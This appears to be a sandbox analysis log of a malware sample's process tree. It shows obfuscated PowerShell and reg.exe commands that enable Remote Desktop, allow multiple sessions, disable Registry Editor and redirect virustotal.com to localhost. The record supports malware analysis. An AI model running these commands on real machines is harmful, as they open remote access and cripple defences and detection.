C:\Windows\system32\cmd.exe /c powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("""UkVHIEFERCAiSEtFWV9MT0NBTF9NQUNISU5FXFNZU1RFTVxDdXJyZW50Q29udHJvbFNldFxDb250cm9sXFRlcm1pbmFsIFNlcnZlciIgL3YgImZEZW55VFNDb25uZWN0aW9ucyIgL3QgUkVHX0RXT1JEIC9kICIwIiAvZg=="""))
7⤵
PID:1888

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("""UkVHIEFERCAiSEtFWV9MT0NBTF9NQUNISU5FXFNZU1RFTVxDdXJyZW50Q29udHJvbFNldFxDb250cm9sXFRlcm1pbmFsIFNlcnZlciIgL3YgImZEZW55VFNDb25uZWN0aW9ucyIgL3QgUkVHX0RXT1JEIC9kICIwIiAvZg=="""))
8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5040

C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
7⤵
PID:1996

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("""UkVHIEFERCAiSEtFWV9MT0NBTF9NQUNISU5FXFNZU1RFTVxDdXJyZW50Q29udHJvbFNldFxDb250cm9sXFRlcm1pbmFsIFNlcnZlciIgL3YgImZTaW5nbGVTZXNzaW9uUGVyVXNlciIgL3QgUkVHX0RXT1JEIC9kICIwIiAvZg=="""))
7⤵
PID:3084

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("""UkVHIEFERCAiSEtFWV9MT0NBTF9NQUNISU5FXFNZU1RFTVxDdXJyZW50Q29udHJvbFNldFxDb250cm9sXFRlcm1pbmFsIFNlcnZlciIgL3YgImZTaW5nbGVTZXNzaW9uUGVyVXNlciIgL3QgUkVHX0RXT1JEIC9kICIwIiAvZg=="""))
8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1364

C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fSingleSessionPerUser" /t REG_DWORD /d "0" /f
7⤵
PID:5112

C:\Windows\SysWOW64\timeout.exe
timeout /t 3
7⤵
- Delays execution with timeout.exe
PID:432

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(""""""))
7⤵
PID:440

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(""""""))
8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2100

C:\Windows\SysWOW64\cmd.exe
cmd /c
7⤵
PID:4328

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(""""""))
7⤵
PID:3856

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(""""""))
8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4892

C:\Windows\SysWOW64\cmd.exe
cmd /c
7⤵
PID:4864

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(""""""))
7⤵
PID:4896

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(""""""))
8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4008

C:\Windows\SysWOW64\cmd.exe
cmd /c
7⤵
PID:4532

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(""""""))
7⤵
PID:1060

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(""""""))
8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3752

C:\Windows\SysWOW64\cmd.exe
cmd /c
7⤵
PID:540

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(""""""))
7⤵
PID:4404

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(""""""))
8⤵
PID:480

C:\Windows\SysWOW64\cmd.exe
cmd /c
7⤵
PID:4844

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(""""""))
7⤵
PID:804

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(""""""))
8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3784

C:\Windows\SysWOW64\cmd.exe
cmd /c
7⤵
PID:112

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(""""""))
7⤵
PID:3932

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(""""""))
8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2748

C:\Windows\SysWOW64\cmd.exe
cmd /c
7⤵
PID:1116

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(""""""))
7⤵
PID:4864

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(""""""))
8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4968

C:\Windows\SysWOW64\cmd.exe
cmd /c
7⤵
PID:5084

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(""""""))
7⤵
PID:3776

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(""""""))
8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4532

C:\Windows\SysWOW64\cmd.exe
cmd /c
7⤵
PID:2420

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(""""""))
7⤵
PID:4512

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(""""""))
8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3124

C:\Windows\SysWOW64\cmd.exe
cmd /c
7⤵
PID:2464

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(""""""))
7⤵
PID:3820

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(""""""))
8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4964

C:\Windows\SysWOW64\cmd.exe
cmd /c
7⤵
PID:2936

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(""""""))
7⤵
PID:2200

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(""""""))
8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2152

C:\Windows\SysWOW64\cmd.exe
cmd /c
7⤵
PID:1624

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(""""""))
7⤵
PID:756

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(""""""))
8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1228

C:\Windows\SysWOW64\cmd.exe
cmd /c
7⤵
PID:2020

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(""""""))
7⤵
PID:4448

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(""""""))
8⤵
- Suspicious use of AdjustPrivilegeToken
PID:2392

C:\Windows\SysWOW64\cmd.exe
cmd /c
7⤵
PID:4832

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(""""""))
7⤵
- Suspicious behavior: EnumeratesProcesses
PID:1364

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(""""""))
8⤵
- Suspicious use of AdjustPrivilegeToken
PID:1764

C:\Windows\SysWOW64\cmd.exe
cmd /c
7⤵
PID:2324

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(""""""))
7⤵
PID:4788

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(""""""))
8⤵
PID:1252

C:\Windows\SysWOW64\cmd.exe
cmd /c
7⤵
PID:3932

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(""""""))
7⤵
PID:912

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(""""""))
8⤵
- Suspicious use of AdjustPrivilegeToken
PID:2648

C:\Windows\SysWOW64\cmd.exe
cmd /c
7⤵
PID:1036

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(""""""))
7⤵
PID:5032

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(""""""))
8⤵
- Suspicious use of AdjustPrivilegeToken
PID:772

C:\Windows\SysWOW64\cmd.exe
cmd /c
7⤵
PID:1644

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(""""""))
7⤵
PID:2320

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(""""""))
8⤵
PID:4852

C:\Windows\SysWOW64\cmd.exe
cmd /c
7⤵
PID:1364

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(""""""))
7⤵
PID:2324

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(""""""))
8⤵
- Suspicious use of AdjustPrivilegeToken
PID:3312

C:\Windows\SysWOW64\cmd.exe
cmd /c
7⤵
PID:488

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(""""""))
7⤵
PID:1996

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(""""""))
8⤵
- Suspicious use of AdjustPrivilegeToken
PID:2248

C:\Windows\SysWOW64\cmd.exe
cmd /c
7⤵
- Suspicious use of AdjustPrivilegeToken
PID:1252

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(""""""))
7⤵
PID:4540

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(""""""))
8⤵
PID:3720

C:\Windows\SysWOW64\cmd.exe
cmd /c
7⤵
PID:1636

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(""""""))
7⤵
PID:3736

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(""""""))
8⤵
- Suspicious use of AdjustPrivilegeToken
PID:3776

C:\Windows\SysWOW64\cmd.exe
cmd /c
7⤵
PID:2016

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(""""""))
7⤵
PID:3144

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(""""""))
8⤵
- Suspicious use of AdjustPrivilegeToken
PID:1720

C:\Windows\SysWOW64\cmd.exe
cmd /c
7⤵
PID:4408

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(""""""))
7⤵
PID:1132

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(""""""))
8⤵
- Suspicious use of AdjustPrivilegeToken
PID:3916

C:\Windows\SysWOW64\cmd.exe
cmd /c
7⤵
PID:5016

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(""""""))
7⤵
PID:1552

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(""""""))
8⤵
- Suspicious use of AdjustPrivilegeToken
PID:2200

C:\Windows\SysWOW64\cmd.exe
cmd /c
7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:480

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(""""""))
7⤵
PID:3240

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(""""""))
8⤵
- Suspicious use of AdjustPrivilegeToken
PID:748

C:\Windows\SysWOW64\cmd.exe
cmd /c
7⤵
PID:1676

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(""""""))
7⤵
PID:4832

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(""""""))
8⤵
PID:3176

C:\Windows\SysWOW64\cmd.exe
cmd /c
7⤵
PID:2184

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(""""""))
7⤵
PID:4116

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(""""""))
8⤵
- Suspicious use of AdjustPrivilegeToken
PID:1664

C:\Windows\SysWOW64\cmd.exe
cmd /c
7⤵
PID:388

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(""""""))
7⤵
PID:860

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(""""""))
8⤵
- Suspicious use of AdjustPrivilegeToken
PID:2800

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(""""""))
7⤵
PID:1412

C:\Windows\SysWOW64\cmd.exe
cmd /c
7⤵
PID:1448

C:\Windows\SysWOW64\cmd.exe
cmd /c
7⤵
PID:5012

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(""""""))
7⤵
PID:2116

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(""""""))
8⤵
- Suspicious use of AdjustPrivilegeToken
PID:3356

C:\Windows\SysWOW64\cmd.exe
cmd /c
7⤵
- Suspicious use of AdjustPrivilegeToken
PID:3720

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(""""""))
7⤵
PID:4540

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(""""""))
8⤵
PID:1440

C:\Windows\SysWOW64\cmd.exe
cmd /c
7⤵
PID:404

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(""""""))
7⤵
PID:4272

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(""""""))
8⤵
- Suspicious use of AdjustPrivilegeToken
PID:1644

C:\Windows\SysWOW64\cmd.exe
cmd /c
7⤵
PID:2096

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(""""""))
7⤵
PID:2936

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(""""""))
8⤵
- Suspicious use of AdjustPrivilegeToken
PID:2068

C:\Windows\SysWOW64\cmd.exe
cmd /c
7⤵
PID:1116

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(""""""))
7⤵
PID:4372

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(""""""))
8⤵
- Suspicious use of AdjustPrivilegeToken
PID:2568

C:\Windows\SysWOW64\cmd.exe
cmd /c
7⤵
PID:1784

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(""""""))
7⤵
PID:3872

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(""""""))
8⤵
PID:1876

C:\Windows\SysWOW64\cmd.exe
cmd /c
7⤵
PID:480

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(""""""))
7⤵
PID:3084

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(""""""))
8⤵
- Suspicious use of AdjustPrivilegeToken
PID:2180

C:\Windows\SysWOW64\cmd.exe
cmd /c
7⤵
PID:5032

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(""""""))
7⤵
PID:1300

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(""""""))
8⤵
- Suspicious use of AdjustPrivilegeToken
PID:1440

C:\Windows\SysWOW64\cmd.exe
cmd /c
7⤵
PID:5076

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(""""""))
7⤵
- Suspicious use of AdjustPrivilegeToken
PID:3176

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(""""""))
8⤵
PID:4408

C:\Windows\SysWOW64\cmd.exe
cmd /c
7⤵
PID:2468

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(""""""))
7⤵
PID:1232

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(""""""))
8⤵
- Suspicious use of AdjustPrivilegeToken
PID:1176

C:\Windows\SysWOW64\cmd.exe
cmd /c
7⤵
- Suspicious use of AdjustPrivilegeToken
PID:1660

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(""""""))
7⤵
PID:4608

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(""""""))
8⤵
- Suspicious use of AdjustPrivilegeToken
PID:940

C:\Windows\SysWOW64\cmd.exe
cmd /c
7⤵
PID:2304

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(""""""))
7⤵
PID:4536

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(""""""))
8⤵
- Suspicious use of AdjustPrivilegeToken
PID:1876

C:\Windows\SysWOW64\cmd.exe
cmd /c
7⤵
PID:804

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(""""""))
7⤵
PID:4648

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(""""""))
8⤵
- Suspicious use of AdjustPrivilegeToken
PID:2420

C:\Windows\SysWOW64\cmd.exe
cmd /c
7⤵
PID:1624

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(""""""))
7⤵
PID:2264

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(""""""))
8⤵
- Suspicious use of AdjustPrivilegeToken
PID:1288

C:\Windows\SysWOW64\cmd.exe
cmd /c
7⤵
PID:2912

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(""""""))
7⤵
- Suspicious use of AdjustPrivilegeToken
PID:4408

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(""""""))
8⤵
PID:388

C:\Windows\SysWOW64\cmd.exe
cmd /c
7⤵
PID:3632

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(""""""))
7⤵
PID:2932

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(""""""))
8⤵
PID:4764

C:\Windows\SysWOW64\cmd.exe
cmd /c
7⤵
PID:4904

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(""""""))
7⤵
PID:1676

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(""""""))
8⤵
- Suspicious use of AdjustPrivilegeToken
PID:1636

C:\Windows\SysWOW64\cmd.exe
cmd /c
7⤵
PID:3812

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(""""""))
7⤵
PID:1456

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(""""""))
8⤵
PID:4592

C:\Windows\SysWOW64\cmd.exe
cmd /c
7⤵
PID:2264

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(""""""))
7⤵
- Suspicious use of AdjustPrivilegeToken
PID:4852

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(""""""))
8⤵
- Suspicious use of AdjustPrivilegeToken
PID:1996

C:\Windows\SysWOW64\cmd.exe
cmd /c
7⤵
PID:1324

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(""""""))
7⤵
PID:2392

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(""""""))
8⤵
- Suspicious use of AdjustPrivilegeToken
PID:388

C:\Windows\SysWOW64\cmd.exe
cmd /c
7⤵
PID:1048

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(""""""))
7⤵
- Suspicious use of AdjustPrivilegeToken
PID:4764

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(""""""))
8⤵
- Suspicious use of AdjustPrivilegeToken
PID:3736

C:\Windows\SysWOW64\cmd.exe
cmd /c
7⤵
PID:4668

C:\Windows\SysWOW64\timeout.exe
timeout /t 3
7⤵
- Delays execution with timeout.exe
PID:1500

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("""UkVHIEFERCBIS0NVXFNvZnR3YXJlXE1pY3Jvc29mdFxXaW5kb3dzXEN1cnJlbnRWZXJzaW9uXFBvbGljaWVzXFN5c3RlbSAvdiAiRGlzYWJsZVJlZ2lzdHJ5VG9vbHMiIC90IFJFR19EV09SRCAvZCAiMSIgL2Y="""))
7⤵
PID:3556

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("""UkVHIEFERCBIS0NVXFNvZnR3YXJlXE1pY3Jvc29mdFxXaW5kb3dzXEN1cnJlbnRWZXJzaW9uXFBvbGljaWVzXFN5c3RlbSAvdiAiRGlzYWJsZVJlZ2lzdHJ5VG9vbHMiIC90IFJFR19EV09SRCAvZCAiMSIgL2Y="""))
8⤵
- Suspicious use of AdjustPrivilegeToken
PID:4592

C:\Windows\SysWOW64\reg.exe
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v "DisableRegistryTools" /t REG_DWORD /d "1" /f
7⤵
- Disables RegEdit via registry modification
- Modifies registry key
PID:1320

C:\Windows\SysWOW64\timeout.exe
timeout /t 3
7⤵
- Delays execution with timeout.exe
PID:2384

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("""ZWNobyAxMjcuMC4wLjEgdmlydXN0b3RhbC5jb20+Pkhvc3Rz"""))
7⤵
PID:480

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
